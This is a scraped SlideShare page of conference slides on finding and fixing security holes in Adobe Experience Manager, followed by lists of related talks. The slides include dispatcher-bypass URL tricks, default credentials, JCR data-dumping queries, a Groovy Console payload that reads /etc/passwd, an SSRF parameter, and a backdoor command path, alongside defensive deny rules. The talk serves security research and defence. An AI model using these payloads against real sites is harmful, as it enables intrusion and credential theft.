SlideShare a Scribd company logo

Securing AEM webapps by hacking them

โ€ข
โ€ข
Mikhail Egorov
Mikhail Egorov

Slides from adaptTo() 2019 - https://adapt.to/2019/en/schedule/securing-aem-webapps-by-hacking-them.html.

Internet
1 of 45
Download to read offline
APACHE SLING & FRIENDS TECH MEETUP 2 - 4 SEPTEMBER 2019 Securing AEM webapps by hacking them Mikhail Egorov @0ang3el, Security researcher & Bug hunter.
2 Intro
whoami 3 ๏‚ง Security researcher & full-time bug hunter ๏‚ง https://bugcrowd.com/0ang3el ๏‚ง https://hackerone.com/0ang3el ๏‚ง Conference speaker ๏‚ง https://www.slideshare.net/0ang3el ๏‚ง https://speakerdeck.com/0ang3el
AEM & Bug Bounties 4
My research on AEM security 5 PHDays 2015 Hacktivity 2018 LevelUp 2019 https://www.slideshare.net/0ang3el
Fellow hackers 6 @darkarnium, 2016 @fransrosen, 2018 @JonathanBoumanium, 2018 https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
Common AEM deployment 7 Interacts with Publish server via AEM Dispatcher! 4503/tcp 4502/tcp 443/tcp ? Main blocks: โ€ข Author AEM instance โ€ข Publish AEM instance โ€ข AEM dispatcher (~WAF)
Sources of vulnerabilities 8 ๏‚ง AEM misconfiguration ๏‚ง AEM code (CVEs) ๏‚ง 3rd-party plugins ๏‚ง Your code
9 Vulnerabilities due to misconfiguration
AEM dispatcher bypass โ€“ CVE-2016-0957 10 ๏‚ง Blocked by Dispatcher ๏‚ง /bin/querybuilder.json ๏‚ง However passed to publish instance ๏‚ง /bin/querybuilder.json/a.css ๏‚ง /bin/querybuilder.json/a.icoS ๏‚ง /bin/querybuilder.json?a.html ๏‚ง /bin/querybuilder.json;%0aa.css
AEM dispatcher bypass โ€“ Sling โ€œfeaturesโ€ 11 ๏‚ง When Sling Servlet is registered with sling.servlet.path other properties are ignored (e.g. sling.servlet.extensions) ๏‚ง Bypassing extension check ๏‚ง /bin/querybuilder.json.css ๏‚ง /bin/querybuilder.feed.ico
AEM dispatcher bypass โ€“ Sling โ€œfeaturesโ€ 12 ๏‚ง When Sling Servlet is registered with sling.servlet.resourceTypes ๏‚ง Bypassing path check ๏‚ง Create node with proper sling:resourceType under /content/usergenerated/etc/commerce/smartlists
AEM dispatcher security tips 13 ๏‚ง Donโ€™t use rules like ๏‚ง /0041 { /type "allow" /url "*.css" } # This is bad ๏‚ง Better use ๏‚ง /0041 { /type "allow" /extension 'css' }
AEM dispatcher security tips 14 ๏‚ง Explicit deny rule for dangerous endpoints ๏‚ง /0090 { /type "deny" /path "/libs/*" } ๏‚ง /0091 { /type "deny" /path "/bin/querybuilder*" } ๏‚ง Place explicit deny rules in the end of policy
Default credentials 15 ๏‚ง admin/admin ๏‚ง author/author ๏‚ง Geometrixx users ๏‚ง grios:password ๏‚ง jdoe@geometrixx.info:jdoe ๏‚ง โ€ฆ
Default credentials 16 == base64(admin:admin)
Weak passwords / Credentials bruterorcing 17 ๏‚ง Properties jcr:createdBy, cq:lastModifiedBy, jcr:lastModifiedBy contain usernames ๏‚ง Many ways to bruteforce ๏‚ง LoginStatusServlet ๏‚ง GetLoggedInUser servlet ๏‚ง CurrentUserServlet ๏‚ง โ€ฆ
Weak permissions for JCR 18 ๏‚ง Many ways to access JCR ๏‚ง DefaultGetServlet ๏‚ง QueryBuilderJsonServlet ๏‚ง QueryBuilderFeedServlet ๏‚ง GQLSearchServlet ๏‚ง CRXDE Lite ๏‚ง โ€ฆ
Weak permissions for JCR 19 ๏‚ง Anonymous user has jcr:write permission for /content/usergenerated/etc/commerce/s martlists
0 /apps/<redacted>/config.author.tidy.1..json/a.ico
Weak permissions for JCR 21 type=nt:file&nodename=*.zip
Weak permissions for JCR 22 path=/home&p.hits=full&p.limit=-1
23 Vulnerabilities due to 3-rd party components
Groovy Console 24 ๏‚ง Exposes servlet at /bin/groovyconsole/post.servlet without authentication by default https://github.com/icfnext/aem-groovy-console
cS4VLFuCHKwX;XS script=def+proc+%3d+โ€cat+/etc/passwdโ€.execute()%0d%0aprintln+proc.text
ACS AEM Tools 26 ๏‚ง Exposes Fiddle with ability to execute JSP scripts on /etc/acs-tools/aem- fiddle/_jcr_content.run.html ๏‚ง May not require authentication
cS4VLFuCHKwX;X
28 AEM vulnerabilities
CVE-2018-12809 (SSRF*) 29 ๏‚ง ReportingServicesProxyServlet (cq-content-insight bundle) @SlingServlet( generateComponent = true, metatype = true, resourceTypes = {"cq/contentinsight/proxy"}, extensions = {"json"}, selectors = {"reportingservices"}, methods = {"GET"}, label = "Reporting Services API proxy servlet", description = "Proxy servlet for Reporting Services API" ) public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet { private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";} โ€ฆ } *SSRF - Server Side Request Forgery
CVE-2018-12809 (SSRF*) 30 ๏‚ง Paths to invoke servlet ๏‚ง /libs/cq/contentinsight/content/proxy.reportingservices.json ๏‚ง /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet ๏‚ง Vulnerable parameter url ๏‚ง url=http://anyurl%23/api1.omniture.com/a *SSRF - Server Side Request Forgery
ExternalJobPostServlet deser / CVE? 34 ๏‚ง Affects AEM 5.5 / AEM 5.6 @Service @Properties(value = { @Property(name = "sling.servlet.extensions", value = "json"), @Property(name = "sling.servlet.paths", value = "/libs/dam/cloud/proxy"), @Property(name = "sling.servlet.methods", value = { "POST", "GET", "HEAD" }) }) public class ExternalJobPostServlet extends SlingAllMethodsServlet { ... }
ExternalJobPostServlet deser / CVE? 35 ๏‚ง Parameter file accepts Java serialized stream and passes to OIS.readObject() ๏‚ง Hard to exploit in OSGI environment
38 Automation
AEM RCE bundle 39 ๏‚ง Allows to get RCE* when having access to Felix Console ๏‚ง https://github.com/0ang3el/aem-rce-bundle.git * RCE โ€“ Remote Code Execution
AEM RCE bundle 40 ๏‚ง Path - /bin/backdoor.html?cmd=ifconfig
AEM Hacker 41 ๏‚ง Scripts to check security of AEM application ๏‚ง aem_hacker.py, aem_discoverer.py, aem_enum.py, aem_ssrf2rce.py, aem_server.py, response.bin, aem-rce-sling-script.sh ๏‚ง https://github.com/0ang3el/aem-hacker.git
DEMO 42
43 Takeaways
Takeaways 44 ๏‚ง Vulnerabilities can occur on different levels ๏‚ง Install security updates ๏‚ง Defense in depth ๏‚ง Check security of AEM application ๏‚ง Pentest / Bug bounty
45 Thank you @0ang3el

Recommended

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
ย 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
ย 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosรฉn
ย 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
ย 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
ย 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
ย 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
ย 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
ย 

Recommended

Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsMikhail Egorov
ย 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
ย 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMFrans Rosรฉn
ย 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesMikhail Egorov
ย 
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappsMikhail Egorov - Hunting for bugs in Adobe Experience Manager webapps
Mikhail Egorov - Hunting for bugs in Adobe Experience Manager webappshacktivity
ย 
A Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityA Hacker's perspective on AEM applications security
A Hacker's perspective on AEM applications securityMikhail Egorov
ย 
What should a hacker know about WebDav?
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
ย 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
ย 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
ย 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
ย 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
ย 
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...Mikhail Egorov
ย 
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win bigLive Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win bigFrans Rosรฉn
ย 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
ย 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
ย 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
ย 
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web TechnologiesFrans Rosรฉn
ย 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsAugust Detlefsen
ย 
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016Frans Rosรฉn
ย 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
ย 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerBrian Hysell
ย 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
ย 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
ย 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugLewis Ardern
ย 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
ย 
Frans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides AhmedabadFrans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides AhmedabadSecurity BSides Ahmedabad
ย 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
ย 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
ย 
Macro malware common techniques - public
Macro malware common techniques - publicMacro malware common techniques - public
Macro malware common techniques - publicSecurity Bootcamp
ย 
Container: is it safe enough to run you application?
Container: is it safe enough to run you application?Container: is it safe enough to run you application?
Container: is it safe enough to run you application?Aleksey Zalesov
ย 

More Related Content

What's hot

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
ย 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)Marco Balduzzi
ย 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
ย 
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...Mikhail Egorov
ย 
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win bigLive Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win bigFrans Rosรฉn
ย 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?Sam Thomas
ย 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
ย 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Jeremiah Grossman
ย 
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web TechnologiesFrans Rosรฉn
ย 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsAugust Detlefsen
ย 
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016Frans Rosรฉn
ย 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
ย 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerBrian Hysell
ย 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked LookJason Lang
ย 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a JediYaroslav Babin
ย 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugLewis Ardern
ย 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
ย 
Frans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides AhmedabadFrans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides AhmedabadSecurity BSides Ahmedabad
ย 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
ย 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesChristopher Frohoff
ย 

What's hot (20)

Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
ย 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
ย 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
ย 
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
CSRF-ัƒัะทะฒะธะผะพัั‚ะธ ะฒัะต ะตั‰ะต ะฐะบั‚ัƒะฐะปัŒะฝั‹: ะบะฐะบ ะฐั‚ะฐะบัƒัŽั‰ะธะต ะพะฑั…ะพะดัั‚ CSRF-ะทะฐั‰ะธั‚ัƒ ะฒ ะฒะฐัˆะตะผ ...
ย 
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win bigLive Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
Live Hacking like a MVH โ€“ A walkthrough on methodology and strategies to win big
ย 
PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?PHP unserialization vulnerabilities: What are we missing?
PHP unserialization vulnerabilities: What are we missing?
ย 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
ย 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
ย 
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 โ€“ Attacking "Modern" Web Technologies
ย 
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp ExtensionsCusomizing Burp Suite - Getting the Most out of Burp Extensions
Cusomizing Burp Suite - Getting the Most out of Burp Extensions
ย 
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter โ€“ Frans Rosรฉn @ Security Fest 2016
ย 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
ย 
Pentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A PrimerPentesting Modern Web Apps: A Primer
Pentesting Modern Web Apps: A Primer
ย 
Red Team Methodology - A Naked Look
Red Team Methodology - A Naked LookRed Team Methodology - A Naked Look
Red Team Methodology - A Naked Look
ย 
XXE: How to become a Jedi
XXE: How to become a JediXXE: How to become a Jedi
XXE: How to become a Jedi
ย 
Manual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A BugManual JavaScript Analysis Is A Bug
Manual JavaScript Analysis Is A Bug
ย 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
ย 
Frans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides AhmedabadFrans Rosรฉn Keynote at BSides Ahmedabad
Frans Rosรฉn Keynote at BSides Ahmedabad
ย 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
ย 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
ย 

Similar to Securing AEM webapps by hacking them

Macro malware common techniques - public
Macro malware common techniques - publicMacro malware common techniques - public
Macro malware common techniques - publicSecurity Bootcamp
ย 
Container: is it safe enough to run you application?
Container: is it safe enough to run you application?Container: is it safe enough to run you application?
Container: is it safe enough to run you application?Aleksey Zalesov
ย 
Software Security Basics
Software Security BasicsSoftware Security Basics
Software Security BasicsCY Lee
ย 
Security of Go Modules and Vulnerability Scanning in GoCenter and VS Code
Security of Go Modules and Vulnerability Scanning in GoCenter and VS CodeSecurity of Go Modules and Vulnerability Scanning in GoCenter and VS Code
Security of Go Modules and Vulnerability Scanning in GoCenter and VS CodeDeep Datta
ย 
Leveraging the power of SolrCloud and Spark with OpenShift
Leveraging the power of SolrCloud and Spark with OpenShiftLeveraging the power of SolrCloud and Spark with OpenShift
Leveraging the power of SolrCloud and Spark with OpenShiftQAware GmbH
ย 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
ย 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
ย 
Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Chromium Sandbox on Linux (BlackHoodie 2018)
Chromium Sandbox on Linux (BlackHoodie 2018)Patricia Aas
ย 
Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Chromium Sandbox on Linux (NDC Security 2019)
Chromium Sandbox on Linux (NDC Security 2019)Patricia Aas
ย 
Android Nรขng cao-Bร i 9-Debug in Android Application Development
Android Nรขng cao-Bร i 9-Debug in Android Application Development Android Nรขng cao-Bร i 9-Debug in Android Application Development
Android Nรขng cao-Bร i 9-Debug in Android Application Development Phuoc Nguyen
ย 
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdftheVIVI-AD-Security-Workshop_AfricaHackon2019.pdf
theVIVI-AD-Security-Workshop_AfricaHackon2019.pdfGabriel Mathenge
ย 
Developer in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameDeveloper in a digital crosshair, 2022 edition - No cON Name
Developer in a digital crosshair, 2022 edition - No cON NameSecuRing
ย 
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCode
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCodeSecurity of Go Modules and Vulnerability Scanning in GoCenter and VSCode
Security of Go Modules and Vulnerability Scanning in GoCenter and VSCodeDeep Datta
ย 
Windows 10 URI persistence technique
Windows 10 URI persistence techniqueWindows 10 URI persistence technique
Windows 10 URI persistence techniqueGiulio Comi
ย 
Android utilities
Android utilitiesAndroid utilities
Android utilitiesRomain Rochegude
ย 
Android CTS training
Android CTS trainingAndroid CTS training
Android CTS trainingjtbuaa
ย 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
ย 
Android Security Internals
Android Security InternalsAndroid Security Internals
Android Security InternalsOpersys inc.
ย 
